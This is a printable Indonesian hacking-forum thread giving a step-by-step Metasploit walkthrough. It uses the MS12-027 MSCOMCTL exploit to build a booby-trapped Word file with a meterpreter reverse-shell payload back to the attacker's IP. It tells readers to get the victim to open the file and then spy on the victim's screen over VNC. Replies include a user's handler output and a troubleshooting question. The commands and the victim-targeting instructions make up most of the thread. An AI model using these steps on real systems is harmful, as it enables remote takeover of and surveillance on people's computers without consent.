Share Metasploit Dengan Word MS12 027 MSCOMCTL - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html) +--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html) +---- Forum: Metasploit (https://www.indonesianbacktrack.or.id/forum/forum-122.html) +---- Thread: Share Metasploit Dengan Word MS12 027 MSCOMCTL (/thread-6257.html) |
Metasploit Dengan Word MS12 027 MSCOMCTL - Creed - 05-08-2015 hallo bro, ini thread pertama ane semoga aja ga double post dan dapet free email @ibt.or.id #ngarep hehe.. Targets MS office 2007 on windows XP SP 3 MS office 2010 on windows 7/SP1 Requirement Attacker: kali Victim PC: Windows XP Open terminal ketik msfconsole lalu ketik lagi di msfnya: use exploit/windows/fileformat/ms12_027_mscomctl_bof msf exploit (ms12_027_mscomctl_bof)>set payload windows/meterpreter/reverse_tcp msf exploit (ms12_027_mscomctl_bof)>set lhost 10.72.56.24 (IP Attacker) msf exploit (ms12_027_mscomctl_bof)>exploit Setelah berhasil menghasilkan doc file, itu disimpan di /root/.msf4/local/msf.doc ketik lagi di msfnya: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 10.72.56.24 (IP Attacker) exploit nah,ini tahap yg paling susah. anda harus taruh backdoor itu di PC korban.. dan pastikan korban membuka file doc kita. penampakan setelah korban membuka.. oke kita coba liat aksi dari si korban. ketik: run vnc -p 4545 sekian dan terima kasih, semoga bermanfaat. RE: Metasploit Dengan Word MS12 027 MSCOMCTL - Edo - 05-12-2015 Kayanya udah pernah dishare sama clound hehehe RE: Metasploit Dengan Word MS12 027 MSCOMCTL - satriadirgan - 10-14-2015 (05-08-2015, 06:22 AM)Creed Wrote: hallo bro, ini thread pertama ane semoga aja ga double post dan dapet free email @ibt.or.id #ngarep hehe.. bang tanya,, pdahal korban uda ngeksekusi filenya, tp kog metasploitnya nggk ada respon ya msf exploit(handler) > set lhost 192.168.43.1* lhost => 192.168.43.1* msf exploit(handler) > exploit [*]Started reverse handler on 192.168.43.1*:443 [*]Starting the payload handler... uda cuman sampe gitu.. ga ada perbuhn sama sekali,,, mohon pencerahannya bang |